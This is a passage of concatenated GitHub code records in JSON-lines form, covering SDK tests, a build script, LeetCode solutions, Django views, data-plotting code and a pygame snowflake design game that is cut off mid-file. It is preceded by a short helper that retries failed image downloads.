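tojson() in the spider.py record above collects failed page numbers in the failed list but never revisits them. A sketch of a second pass over those pages, reusing the record's URL layout and headers; retry_failed is a hypothetical helper, and the timeout and attempt count are assumptions.

import time
from io import BytesIO
import requests
from PIL import Image

def retry_failed(failed, gid, headers, root="https://img.xchina.fun/photos", attempts=2):
    # Retry pages that failed on the first pass; return those that still fail.
    still_failed = []
    for i in failed:
        name = f"{i:04d}.jpg"
        for _ in range(attempts):
            try:
                response = requests.get(f"{root}/{gid}/{name}", headers=headers, timeout=30)
                response.raise_for_status()
                Image.open(BytesIO(response.content)).size   # check the payload decodes
                break
            except Exception:
                time.sleep(1)
        else:
            still_failed.append(i)
    return still_failed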
\"https://keyvault-name.vault.azure.net/deletedsecrets/deleted-secret\"\n parsed_secret_id = KeyVaultSecretIdentifier(source_id)\n\n assert parsed_secret_id.name == \"deleted-secret\"\n assert parsed_secret_id.vault_url == \"https://keyvault-name.vault.azure.net\"\n assert parsed_secret_id.version is None\n assert parsed_secret_id.source_id == \"https://keyvault-name.vault.azure.net/deletedsecrets/deleted-secret\"\n\n\ndef test_parse_secret_id_with_port():\n \"\"\"Regression test for https://github.com/Azure/azure-sdk-for-python/issues/24446\"\"\"\n\n source_id = \"https://localhost:8443/secrets/secret-name/version\"\n parsed_key_id = KeyVaultSecretIdentifier(source_id)\n\n assert parsed_key_id.name == \"secret-name\"\n assert parsed_key_id.vault_url == \"https://localhost:8443\"\n assert parsed_key_id.version == \"version\"\n assert parsed_key_id.source_id == \"https://localhost:8443/secrets/secret-name/version\"\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/keyvault/azure-keyvault-secrets/tests/test_parse_id.py","file_name":"test_parse_id.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"18542122913","text":"import os\nimport glob\nimport shutil\nimport subprocess\n\nWINDOWS_COMPILER = \"C:\\\\TDM-GCC-64\\\\bin\\\\gcc.exe\"\n\ndef empty_folder(folder):\n\n for filename in os.listdir(folder):\n file_path = os.path.join(folder, filename)\n try:\n if os.path.isfile(file_path) or os.path.islink(file_path):\n os.unlink(file_path)\n elif os.path.isdir(file_path):\n shutil.rmtree(file_path)\n except Exception as e:\n print('Failed to delete %s. Reason: %s' % (file_path, e))\n\n\ndef get_package_name():\n\n pkgs = glob.glob(\"*.whl\")\n\n if len(pkgs) != 1:\n raise ValueError(\"Multiple packages in dist.\")\n\n return pkgs[0]\n\n\ndef win_compile(directory, mod_name):\n # Cleanup and build for windows\n\n if not os.path.isfile(WINDOWS_COMPILER):\n msg = f\"Windows compiler not found: {WINDOWS_COMPILER}. 
Please specify a compiler.\"\n raise FileNotFoundError(msg)\n\n os.chdir(directory)\n o_file = os.path.join(directory, mod_name + \".o\")\n dll_file = os.path.join(directory, mod_name + \".dll\")\n\n if os.path.isfile(o_file):\n os.remove(o_file)\n\n if os.path.isfile(dll_file):\n os.remove(dll_file)\n\n obj_cmd = f\"{WINDOWS_COMPILER} -c -o {mod_name}.o {mod_name}.c\"\n dll_cmd = f\"{WINDOWS_COMPILER} -o {mod_name}.dll -s -shared {mod_name}.o -Wl,--subsystem,windows\"\n\n subprocess.call(obj_cmd)\n subprocess.call(dll_cmd)\n\n\ndef rebuild():\n\n base_dir = os.getcwd()\n\n clibs_dir = os.path.join(base_dir, \"npmemory\", \"clibs\")\n\n if not os.path.isdir(\"./build\"):\n os.mkdir(\"./build\")\n \n if not os.path.isdir(\"./dist\"):\n os.mkdir(\"./dist\")\n\n empty_folder(\"./build\")\n empty_folder(\"./dist\")\n\n # Cross-compilation\n\n if os.name == 'posix':\n os.chdir(clibs_dir)\n subprocess.call(\"make\")\n elif os.name == 'nt':\n win_compile(clibs_dir, \"box_average\")\n else:\n raise OSError(f\"OS not supported: {os.name}\")\n\n os.chdir(base_dir)\n\n subprocess.call(\"python setup.py bdist_wheel\", shell=True)\n os.chdir(\"./dist\")\n\n pkg_name = get_package_name()\n print(pkg_name)\n \n subprocess.call(f\"pip uninstall -y {pkg_name}\", shell=True)\n subprocess.call(f\"pip install {pkg_name}\", shell=True)\n\n print(f\"Package installed: {pkg_name}\")\n\n\nrebuild()\n","repo_name":"Fletcher-Climate-Group/npmemory","sub_path":"cross_compile.py","file_name":"cross_compile.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"7112611498","text":"import unittest\n\nimport os\nfrom shutil import rmtree\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom inferno.trainers.basic import Trainer\nfrom torch.utils.data.dataset import TensorDataset\nfrom torch.utils.data.dataloader import DataLoader\nfrom inferno.trainers.callbacks.logging.tensorboard import TensorboardLogger\nfrom inferno.extensions.layers.reshape import AsMatrix\n\n\nclass TestTensorboard(unittest.TestCase):\n ROOT_DIR = os.path.dirname(__file__)\n PRECISION = 'float'\n SAVE_DIRECTORY = os.path.join(ROOT_DIR, 'saves')\n LOG_DIRECTORY = os.path.join(ROOT_DIR, 'logs')\n\n @staticmethod\n def _make_test_model(input_channels):\n toy_net = nn.Sequential(nn.Conv2d(input_channels, 8, 3, 1, 1),\n nn.ELU(),\n nn.MaxPool2d(2),\n nn.Conv2d(8, 8, 3, 1, 1),\n nn.ELU(),\n nn.MaxPool2d(2),\n nn.Conv2d(8, 16, 3, 1, 1),\n nn.ELU(),\n nn.AdaptiveMaxPool2d((1, 1)),\n AsMatrix(),\n nn.Linear(16, 10))\n return toy_net\n\n def tearDown(self):\n for d in [self.SAVE_DIRECTORY, self.LOG_DIRECTORY]:\n try:\n rmtree(d)\n except OSError:\n pass\n\n def get_random_dataloaders(self, input_channels=3):\n # Convert build random tensor dataset\n data_shape = (1, input_channels, 64, 64)\n target_shape = (1)\n random_array = torch.from_numpy(np.random.rand(*data_shape)).float()\n target_array = torch.from_numpy(np.random.randint(0, 9, size=target_shape))\n train_dataset = TensorDataset(random_array, target_array)\n test_dataset = TensorDataset(random_array, target_array)\n\n # Build dataloaders from dataset\n train_loader = DataLoader(train_dataset, batch_size=1,\n shuffle=True, num_workers=0, pin_memory=False)\n test_loader = DataLoader(test_dataset, batch_size=1,\n shuffle=True, num_workers=0, pin_memory=False)\n return train_loader, test_loader\n\n def get_trainer(self, input_channels):\n # Build model\n net = 
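cross_compile.py above ignores the return codes of its subprocess.call invocations, so a failed gcc or pip step only surfaces later as a missing artifact. One way to make each build step fail fast, sketched with subprocess.run and argument lists; the command layout is copied from the record and this is an illustration rather than a drop-in replacement.

import subprocess

def run_step(args, **kwargs):
    # Run one build step and raise CalledProcessError if it exits non-zero.
    print("running:", " ".join(args))
    subprocess.run(args, check=True, **kwargs)

# e.g. the two Windows steps from win_compile():
# run_step([WINDOWS_COMPILER, "-c", "-o", f"{mod_name}.o", f"{mod_name}.c"])
# run_step([WINDOWS_COMPILER, "-o", f"{mod_name}.dll", "-s", "-shared",
#           f"{mod_name}.o", "-Wl,--subsystem,windows"])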
self._make_test_model(input_channels)\n # Build trainer\n trainer = Trainer(net)\\\n .build_logger(TensorboardLogger(send_image_at_batch_indices=0,\n send_image_at_channel_indices='all',\n log_images_every=(20, 'iterations')),\n log_directory=self.LOG_DIRECTORY)\\\n .build_criterion('CrossEntropyLoss')\\\n .build_metric('CategoricalError')\\\n .build_optimizer('Adam')\\\n .validate_every((1, 'epochs'))\\\n .save_every((2, 'epochs'), to_directory=self.SAVE_DIRECTORY)\\\n .save_at_best_validation_score()\\\n .set_max_num_epochs(2)\\\n .set_precision(self.PRECISION)\n # Bind loaders\n train_loader, test_loader = self.get_random_dataloaders(input_channels=input_channels)\n trainer.bind_loader('train', train_loader).bind_loader('validate', test_loader)\n return trainer\n\n def test_tensorboard(self):\n trainer = self.get_trainer(3)\n trainer.fit()\n\n def test_tensorboard_grayscale(self):\n trainer = self.get_trainer(1)\n trainer.fit()\n\n def test_serialization(self):\n trainer = self.get_trainer(3)\n # Serialize\n trainer.save()\n # Unserialize\n trainer = Trainer().load(os.path.join(self.ROOT_DIR, 'saves'))\n train_loader, test_loader = self.get_random_dataloaders(input_channels=3)\n trainer.bind_loader('train', train_loader).bind_loader('validate', test_loader)\n trainer.fit()\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"inferno-pytorch/inferno","sub_path":"tests/test_training/test_callbacks/test_logging/test_tensorboard.py","file_name":"test_tensorboard.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","stars":245,"dataset":"github-code","pt":"54"} +{"seq_id":"27344015483","text":"from time import time\nfrom typing import List\nfrom heapq import *\n\n\nclass Solution:\n def isPossible(self, target: List[int]) -> bool:\n s = 0\n heap = []\n for t in target:\n heappush(heap, -t)\n s += t\n while s != len(target):\n biggest = -heappop(heap)\n s -= biggest\n if s == 1:\n return True\n if s == 0 or biggest <= s:\n return False\n new = biggest % s\n if new == 0:\n return False\n heappush(heap, -new)\n s += new\n return True\n\n\nstart_time = time()\n\n_target = [9, 3, 5]\n# _target = [1,1,1,2]\n_target = [8,5]\n_target = [1,1000000000]\n# _target = [2,900000001]\n# _target = [2]\n# Input: target = [9,3,5]\n# Output: true\n# Explanation: Start with arr = [1, 1, 1]\n# [1, 1, 1], sum = 3 choose index 1\n# [1, 3, 1], sum = 5 choose index 2\n# [1, 3, 5], sum = 9 choose index 0\n# [9, 3, 5] Done\n\nprint(Solution().isPossible(_target))\n\nprint(\"--- %s seconds ---\" % (time() - start_time))","repo_name":"Sadomtsevvs/Leetcode","sub_path":"1354. Construct Target Array With Multiple Sums.py","file_name":"1354. 
Construct Target Array With Multiple Sums.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43611610257","text":"from django.shortcuts import render, get_object_or_404, redirect\nfrom django.core.paginator import Paginator\nfrom django.urls import reverse_lazy\nfrom pprint import pprint\nfrom django.views.decorators.csrf import csrf_protect\n\nfrom .models import Application\n\n\n\n\n\nfrom django.views.generic import (\n DetailView,\n ListView,\n UpdateView,\n DeleteView, \n CreateView,\n TemplateView\n)\nfrom .models import Job\nfrom apps.core.models import Commune\n# List Job View\nclass JobListView(ListView):\n\n template_name = 'jobs/job_list.html'\n model = Job\n \n\n\n\ndef job_application(request, job_id):\n print('job application ====================')\n \n if request.user.is_authenticated:\n user = request.user\n job = get_object_or_404(Job, id=job_id)\n Application.objects.create(job=job, applicant=user)\n print(f\"user : {user.email} subscribed to job:{job}\")\n else:\n print('user is not authenticated')\n return redirect(\"jobs:job_list\")\n\n\n \n\n \n# Create Job View\nclass JobCreateView(CreateView):\n template_name = 'jobs/job_create.html'\n model = Job\n fields='__all__'\n \n\n def get_context_data(self, **kwargs):\n context = super(JobCreateView, self).get_context_data(**kwargs)\n context[\"communes\"] = Commune.objects.all()\n \n\n return context\n success_url = reverse_lazy('accounts:signup_success')\n def form_valid(self, form):\n response = super().form_valid(form)\n form.save()\n print(\"hello\", form)\n return response \n \nclass SignupsuccessView(TemplateView):\n template_name = \"jobs/job_create.html\" \n\n\n\n \n\n# Update Job View\nclass JobUpdateView(UpdateView):\n template_name = 'jobs/job_update.html'\n model = Job\n\n\n \n# Detail Job View\nclass JobDetailView(DetailView):\n template_name = 'jobs/job_detail.html'\n model = Job\n pk_url_kwarg = 'id'\n def get(self, request, id):\n job_courant = Job.objects.get(pk=id)\n objets_similaires = Job.objects.filter(budget=job_courant.budget, created=job_courant.created)\n\n context = {\n 'job_courant': job_courant,\n 'objets_similaires': objets_similaires\n }\n\n return render(request, 'jobs/job_detail.html', context)\n\n\n # context_object_name = \"job\"\n\n #def apply_now(self, request, *args, **kwargs):\n #if request.method == 'POST':\n # name = request.POST.get('name')\n #email = request.POST.get('emailaddress')\n # cv_file = request.FILES.get('upload-cv')\n #application = Application(name=name, email=email, cv_file=cv_file)\n # application.save()\n # return redirect('success_page') # Rediriger vers une page de réussite\n #return render(request, 'apply_now.html') # Afficher le formulair\n \n\n\n\n\n\n \n\n# Delete Job View\nclass JobDeleteView(DeleteView):\n template_name = 'jobs/job_delete.html'\n model = Job\n\n\n \n","repo_name":"miyou995/octojobs","sub_path":"apps/jobs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"16054658515","text":"import pandas as pd\n# import numpy as np\nfrom pathlib import Path\n# import json\n\nfrom plot_KernHistory_scripts import punt_att, year_boxen, punt_distance_reg,\\\n xPA_reg, binary_reg\n\n # Part 1 - Kern vs NFL 2009-2021, only punts as a Titan\np = Path(Path.cwd(), 'processed data')\n# Gather all punt data 2009-2021\npunts = 
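The isPossible solution above runs the construction backwards: the largest entry must have been written last, so it is repeatedly replaced by largest % (sum of the rest) until everything collapses to 1, with early exits for the degenerate cases. A compact restatement with a worked trace, written only to make the modulo step concrete:

from heapq import heapify, heappop, heappush

def can_construct(target):
    # Backward check equivalent to the record's isPossible.
    total = sum(target)
    heap = [-t for t in target]
    heapify(heap)
    while total != len(target):              # done once every entry is 1
        biggest = -heappop(heap)
        rest = total - biggest
        if rest == 1:                        # e.g. [1, 10**9]: biggest must reduce to 1
            return True
        if rest == 0 or biggest <= rest:     # the largest entry can no longer shrink
            return False
        reduced = biggest % rest             # undo many "add the rest of the array" steps at once
        if reduced == 0:
            return False
        heappush(heap, -reduced)
        total = rest + reduced
    return True

# [9,3,5]: 9 -> 9 % 8 = 1, then 5 -> 5 % 4 = 1, then 3 -> 3 % 2 = 1, giving [1,1,1].
assert can_construct([9, 3, 5]) is True
assert can_construct([1, 1_000_000_000]) is True
assert can_construct([1, 1, 1, 2]) is False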
pd.read_parquet(Path(p,'TN_punts_2009-2021.parquet'))\nothers = pd.read_parquet(Path(p,'notTN_punts_2009-2021.parquet'))\npunts = pd.concat([punts,others])\npunts.reset_index(drop=True, inplace=True)\n\n# ensure datatypes\nfor val in ['yardline_100','punt_blocked','punt_inside_twenty','punt_in_endzone','punt_out_of_bounds',\n 'punt_downed','punt_fair_catch','kick_distance','net_yards','punt_returned']:\n punts.loc[:,val] = punts[val].astype(int)\n\n# mark Kern for plots, lump everyone else together \npunts.loc[punts[punts.punter_player_name != 'B.Kern'].index, 'punter_player_name'] = 'Rest of NFL'\n \n\n# Punt Attempts vs Yds to go (KDE+bars)\npunt_att(punts, (2017,2020)) \n\n# OOB/YTG vs year and Net/YTG vs year, boxen\n# year_boxen(punts,'punt_out_of_bounds',(2014,2022))\nyear_boxen(punts,'net_yards',(2016,2022))\n\n # LM Plots\n# Big Binary Regressions\nsub = punts.loc[:,['yardline_100','season','punter_player_name', \n 'punt_inside_twenty','touchback','punt_out_of_bounds', \n 'punt_downed','punt_fair_catch']]\nbinary_reg(sub)\ndel sub\n\n# Punt Distance Regressions\npunt_distance_reg(punts.loc[:,['yardline_100','season','punter_player_name', \n 'kick_distance','net_yards']])\n\n# EPA/WPA Regressions\nxPA_reg(punts.loc[:,['yardline_100','season','punter_player_name', 'epa','wpa']])\n\n## Return rate vs YTG comes from other plot_Punts\n\n\n","repo_name":"NBPub/TitanUp","sub_path":"code/graphing/plot_KernHistory.py","file_name":"plot_KernHistory.py","file_ext":"py","file_size_in_byte":1762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30316239586","text":"#!/usr/bin/env python3\n''' Test for host and zone properties on XML platform. '''\n\nfrom helper import *\nimport pytest\n\ndef simple_platform_properties(platform, workload, algorithm):\n test_name = f'simple-platform-properties-{algorithm.name}-{platform.name}-{workload.name}'\n output_dir, robin_filename, _ = init_instance(test_name)\n\n if algorithm.sched_implem != 'pybatsim': raise Exception('This test only supports pybatsim for now')\n\n batcmd = gen_batsim_cmd(platform.filename, workload.filename, output_dir, \"\")\n instance = RobinInstance(output_dir=output_dir,\n batcmd=batcmd,\n schedcmd=f\"pybatsim {algorithm.sched_algo_name}\",\n simulation_timeout=30, ready_timeout=5,\n success_timeout=10, failure_timeout=0\n )\n\n instance.to_file(robin_filename)\n ret = run_robin(robin_filename)\n if ret.returncode != 0: raise Exception(f'Bad robin return code ({ret.returncode})')\n\ndef test_simple_platform_properties(properties_platform, mixed_workload, pybatsim_filler_algorithm):\n simple_platform_properties(properties_platform, mixed_workload, pybatsim_filler_algorithm)\n","repo_name":"oar-team/batsim","sub_path":"test/test_platform_properties.py","file_name":"test_platform_properties.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"54"} +{"seq_id":"70926807522","text":"class Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates = sorted(candidates)\n res = []\n \n print(candidates)\n \n # def backtracking(i, part_sum):\n def backtracking(i, part_sum):\n # if partsum == target: append\n if sum(part_sum) == target: \n res.append(part_sum.copy())\n return\n # part_sum > target: return\n if sum(part_sum) > target or i >= len(candidates): return\n \n # case 1. 
include curr i -> backtracking(i+1, part_sum)\n part_sum.append(candidates[i])\n backtracking(i+1, part_sum)\n \n \n # case 2. X include curr i\n # skip = curr[i]\n # while curr[i] == skip: i+= 1\n skip = part_sum.pop()\n while i < len(candidates) and skip == candidates[i]:\n i += 1\n\n backtracking(i, part_sum)\n \n \n backtracking(0, [])\n return res\nclass Solution:\n def combinationSum2(self, candidates: List[int], target: int) -> List[List[int]]:\n candidates = sorted(candidates)\n res = []\n \n def backtrack(part, index):\n part_sum = sum(part)\n if part_sum == target: \n res.append(part.copy())\n return\n if part_sum > target or index >= len(candidates): return\n \n #include candidates[index]\n part.append(candidates[index])\n backtrack(part, index + 1)\n \n # X include candidates[index]\n skip = part.pop()\n while index < len(candidates) and candidates[index] == skip:\n index += 1\n backtrack(part, index)\n \n \n backtrack([],0)\n return res","repo_name":"hogilkim/leetcode","sub_path":"40. Combination Sum II.py","file_name":"40. Combination Sum II.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42749769287","text":"import numpy as np\nfrom bokeh.models import Arrow, VeeHead, Label\n\n\ndef arrows(pos_i=None, pos_f=None, p=None, names=None, color='black'):\n\n if pos_i is None:\n pos_i = np.zeros_like(pos_f)\n \n for i, (x0, y0, xf, yf) in enumerate(np.hstack((pos_i, pos_f))):\n p.add_layout(\n Arrow(end=VeeHead(fill_color=color, line_color=color, size=10),\n x_start=x0, y_start=y0, x_end=xf, y_end=yf)\n )\n\n if names is not None:\n vec_norm = np.sqrt((xf - x0)**2 + (yf - y0)**2)\n \n labels = Label(x=xf, y=yf,\n text=names[i],\n text_color=color,\n x_offset=vec_norm*0.2, y_offset=vec_norm*0.2)\n\n p.add_layout(labels)\n\n return p\n","repo_name":"Puumanamana/ecotools","sub_path":"ecotools/plotting/arrows.py","file_name":"arrows.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24893866705","text":"# dfs, bfs\nimport collections\nimport heapq\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nn, m, v = map(int, input().split())\n\nll = [[] for _ in range(n+1)]\n\nfor i in range(m) :\n a , b = map(int,input().split())\n ll[a].append(b)\n ll[b].append(a)\n\nfor i in range(n+1) :\n ll[i].sort()\nvisited = [False] * (n+1)\ndef dfs(v) :\n visited[v] = True\n print(v, end = \" \")\n for node in ll[v] :\n if not visited[node] :\n dfs(node)\n\ndef bfs(v) :\n q = deque()\n visited[v] = True\n q.append(v)\n print(v, end = \" \")\n while q :\n nodelist = q.popleft()\n for node in ll[nodelist] :\n if not visited[node] :\n q.append(node)\n visited[node] = True\n print(node, end = \" \")\n\ndfs(v)\nprint()\nvisited = [False] * (n+1)\n\n\nbfs(v)\n","repo_name":"sy8044/snippet","sub_path":"BJ1260.py","file_name":"BJ1260.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71587391201","text":"\"\"\"Mini-batch transformer\"\"\"\n\nfrom torch.utils.data import functional_datapipe\n\nfrom torchdata.datapipes.iter import Mapper\n\nfrom .minibatch import MiniBatch\n\n__all__ = [\n \"MiniBatchTransformer\",\n \"DGLMiniBatchConverter\",\n]\n\n\n@functional_datapipe(\"transform\")\nclass MiniBatchTransformer(Mapper):\n \"\"\"A mini-batch transformer used to manipulate 
mini-batch\"\"\"\n\n def __init__(\n self,\n datapipe,\n transformer,\n ):\n \"\"\"\n Initlization for a subgraph transformer.\n Parameters\n ----------\n datapipe : DataPipe\n The datapipe.\n transformer:\n The function applied to each minibatch which is responsible for\n transforming the minibatch.\n \"\"\"\n super().__init__(datapipe, self._transformer)\n self.transformer = transformer\n\n def _transformer(self, minibatch):\n minibatch = self.transformer(minibatch)\n assert isinstance(\n minibatch, MiniBatch\n ), \"The transformer output should be an instance of MiniBatch\"\n return minibatch\n\n\n@functional_datapipe(\"to_dgl\")\nclass DGLMiniBatchConverter(Mapper):\n \"\"\"Convert a graphbolt mini-batch to a dgl mini-batch.\"\"\"\n\n def __init__(\n self,\n datapipe,\n ):\n \"\"\"\n Initlization for a subgraph transformer.\n Parameters\n ----------\n datapipe : DataPipe\n The datapipe.\n \"\"\"\n super().__init__(datapipe, MiniBatch.to_dgl)\n","repo_name":"dmlc/dgl","sub_path":"python/dgl/graphbolt/minibatch_transformer.py","file_name":"minibatch_transformer.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"8343706144","text":"from __future__ import division\nimport random, math, pygame, json, os.path\nfrom . import pview, flake, background, ptext, render, shape, view, hud, settings, client, sound\nfrom . import frostscene, uploadscene, winscene, scene, progress, stagedata\nfrom .pview import T\n\nclass self:\n\tpass\n\n# Zoomed-in wedge on the left\nFspot0 = (280, 710), 700\n# Full flake view on the right\nFspot1 = (920, 360), 320\n\n# Region of mouse where the player can interact with the wedge.\nFbox0 = pygame.Rect((220, 0, 460, 720))\n\ndef init(stage):\n\tself.stage = stage\n\tself.design = flake.Design.empty()\n\t\n#\tself.points = [(random.uniform(-1, 1), random.uniform(-1, 1)) for _ in range(20)]\n#\tself.points = [p for p in self.points if math.length(p) < 1]\n\t\n#\tself.pshape = shape.Shard((0, 0), \"red\", (0.06, 0.12))\n\n\tself.panchor = None\n\tself.held = None\n\t\n\tself.store = []\n\t\n\tif stage == \"free\":\n\t\tif \"Shard\" in progress.shapes:\n\t\t\tself.store.append([shape.Shard((0, 0.5), \"white\", (0.06, 0.12)), None])\n\t\tif \"Blade\" in progress.shapes:\n\t\t\tself.store.append([shape.Blade((0, 0.5), \"white\", (0.02, 0.06)), None])\n\t\tif \"Ring\" in progress.shapes:\n\t\t\tself.store.append([shape.Ring((0, 0.5), \"white\", 0.03), None])\n\t\tif \"Bar\" in progress.shapes:\n\t\t\tself.store.append([shape.Bar((0, 0.5), \"white\", 0.03), None])\n\t\tif \"Branch\" in progress.shapes:\n\t\t\tself.store.append([shape.Branch((0.2, 0.6), \"white\", (0.03, 0.09)), None])\n\t\tif \"Claw\" in progress.shapes:\n\t\t\tself.store.append([shape.Claw((0, 0.5), \"white\", (0.06, 0.12)), None])\n\t\tif \"Crown\" in progress.shapes:\n\t\t\tself.store.append([shape.Crown((0.2, 0.5), \"white\", 0.04), None])\n\t\tif \"Cusp\" in progress.shapes:\n\t\t\tself.store.append([shape.Cusp((0.2, 0.5), \"white\", 0.04), None])\n\t\tif \"Star\" in progress.shapes:\n\t\t\tself.store.append([shape.Star((0, 0.5), \"white\", 0.12), None])\n\t\tfor shp, n in self.store:\n\t\t\tshp.setksize(2)\n\tif stage in stagedata.store:\n\t\tfor k, color, ksize, v in stagedata.store[stage]:\n\t\t\tif k == \"Shard\":\n\t\t\t\tshp = shape.Shard((0, 0.5), color, (0.06, 0.12))\n\t\t\tif k == \"Blade\":\n\t\t\t\tshp = shape.Blade((0, 0.5), color, (0.06, 0.12))\n\t\t\tif k == \"Ring\":\n\t\t\t\tshp = 
shape.Ring((0, 0.5), color, 0.03)\n\t\t\tif k == \"Bar\":\n\t\t\t\tshp = shape.Bar((0, 0.5), color, 0.03)\n\t\t\tif k == \"Branch\":\n\t\t\t\tshp = shape.Branch((0.2, 0.6), color, (0.06, 0.12))\n\t\t\tif k == \"Claw\":\n\t\t\t\tshp = shape.Claw((0, 0.5), color, (0.06, 0.12))\n\t\t\tif k == \"Cusp\":\n\t\t\t\tshp = shape.Cusp((0, 0.5), color, 0.04)\n\t\t\tif k == \"Star\":\n\t\t\t\tshp = shape.Star((0, 0.5), color, 0.12)\n\t\t\tshp.setksize(ksize)\n\t\t\tself.store.append([shp, v])\n\tself.maxshapes = progress.maxshapes if stage == \"free\" else None\n\n\tself.buttons = [\n\t\thud.Button(((1200, 640), 50), \"Quit\"),\n\t]\n\n\tself.labels = []\n\tif self.stage == \"free\":\n\t\tif not settings.offline:\n\t\t\tself.buttons.append(hud.Button(((640, 640), 50), \"Share\"))\n\t\tif len(progress.colors) > 1:\n\t\t\tfor jcolor, color in enumerate(progress.colors):\n\t\t\t\tFspot = (180 + 23 * (jcolor % 2), 36 * jcolor + 60), 20\n\t\t\t\ttext = \"???\" if color == \"?\" else \"color-%s\" % color\n\t\t\t\tdrawtext = color == \"?\"\n\t\t\t\tbcolor = color if color != \"?\" else \"#cccccc\"\n\t\t\t\tself.buttons.append(hud.Button(Fspot, text, drawtext = drawtext, color = bcolor))\n\t\t\tself.labels.append((\"Color\", (180 + 23/2, 20)))\n\t\tif len(progress.sizes) > 1:\n\t\t\ty = 500\n\t\t\tfor jsize, size in enumerate(progress.sizes):\n\t\t\t\tFspot = (180 + 23 * (jsize % 2), y), 10 + 5 * size\n\t\t\t\ty += 25 + 10 * size\n\t\t\t\tself.buttons.append(hud.Button(Fspot, \"size-%s\" % size, drawtext = False))\n\t\t\tself.labels.append((\"Size\", (180 + 23/2, 460)))\n\n\tsetpoints()\n\tself.todo = True\n\tself.done = False\n\tself.pushed = False\n\tself.tdone = 0\n\n\n\tfor j, (shp, count) in enumerate(self.store):\n\t\tFspot = (50 + 48 * (j % 2), 60 + 82 * j), 44\n\t\tself.buttons.append(hud.Button(Fspot, \"store-%d\" % j, drawtext = False, color = \"#999999\", shape = shp))\n\t\n\tself.ydata, self.ndata = [], []\n\n\tif \"stage\" in self.stage:\n\t\tsound.playmusic(\"twisting\")\n\telif self.stage == \"free\":\n\t\tsound.playmusic(\"techlive\")\n\telse:\n\t\tsound.playmusic(\"undaunted\")\n\ndef setpoints():\n\tself.yespoints = []\n\tself.nopoints = []\n\tif self.stage in stagedata.points:\n\t\tyes, no = stagedata.points[self.stage]\n\t\tfor a, r, n in yes:\n\t\t\tif settings.collapsepoints:\n\t\t\t\tn = 0\n\t\t\tif n % 2 == 1:\n\t\t\t\ta = 1 - a\n\t\t\tC, S = math.CS((n + a) / 12 * math.tau, r)\n\t\t\tself.yespoints.append((S, C))\n\t\tfor a, r, n in no:\n\t\t\tif settings.collapsepoints:\n\t\t\t\tn = 0\n\t\t\tif n % 2 == 1:\n\t\t\t\ta = 1 - a\n\t\t\tC, S = math.CS((n + a) / 12 * math.tau, r)\n\t\t\tself.nopoints.append((S, C))\n\tcheckcover()\n\ndef toggleeasy():\n\tsettings.closepoints = not settings.closepoints\n\tsettings.collapsepoints = settings.closepoints\n\tsetpoints()\n\ndef think(dt, controls):\n\t\n#\tself.inFbox0 = Fbox0.collidepoint(controls.mpos)\n\tself.mpos = controls.mpos\n\tself.ppos = view.FconvertB(Fspot0, controls.mpos)\n\tx, y = self.ppos\n\tself.inFbox0 = -0.06 < x < y / math.sqrt(3) + 0.06\n#\tif controls.mdown:\n#\t\tself.design.addcircle((x, y), 0.2, random.choice([\"red\", \"orange\", \"yellow\", \"white\", \"green\"]))\n#\t\tcolors = [\"#ffffff\", \"#ddddff\", \"#ddeeff\"]\n#\t\tself.design.addshard(self.ppos, (0.06, 0.12), random.choice(colors))\n#\t\tself.design.addshape(\"blade\", self.ppos, random.choice(colors), width = 0.01)\n\tbackground.update(dt, (20, 20, 60))\n#\tself.pointcolor = self.design.colorat(view.FconvertB(Fspot1, controls.mpos))\n\tself.pointcolor = 
None\n#\tself.pshape.anchors[0] = self.pshape.constrain(self.ppos, 0)\n\n\tself.panchor = None\n\tif self.held is None and self.inFbox0:\n\t\tpanchors = [(math.distance(self.ppos, anchor), i, j) for i, j, anchor in self.design.anchors()]\n\t\tif panchors:\n\t\t\td, i, j = min(panchors)\n\t\t\tif d < 0.03:\n\t\t\t\tself.panchor = i, j\n\n\tif self.panchor and controls.mdown:\n\t\ti, self.jheld = self.panchor\n\t\tself.held = self.design.shapes.pop(i)\n\t\tself.cursorimg = self.held.tobasic().cursorimg(T(100))\n\t\tself.design.undraw()\n\n\tif self.held:\n\t\tself.held.constrainanchor(self.jheld, self.ppos)\n\t\tif controls.mup:\n\t\t\tif self.inFbox0:\n\t\t\t\tself.design.shapes.append(self.held)\n\t\t\t\tself.design.undraw()\n\t\t\t\tsound.play(\"bonk\")\n\t\t\telif self.stage != \"free\":\n\t\t\t\tjstore = getjstore(self.held)\n\t\t\t\tstore = self.store[jstore]\n\t\t\t\tif store[1] is not None:\n\t\t\t\t\tstore[1] += 1\n\t\t\tself.held = None\n\t\tcheckcover()\n\n\tself.jbutton = None\n\tif not self.held and not self.inFbox0:\n\t\tfor jbutton, button in enumerate(self.buttons):\n\t\t\tif button.contains(controls.mpos):\n\t\t\t\tself.jbutton = 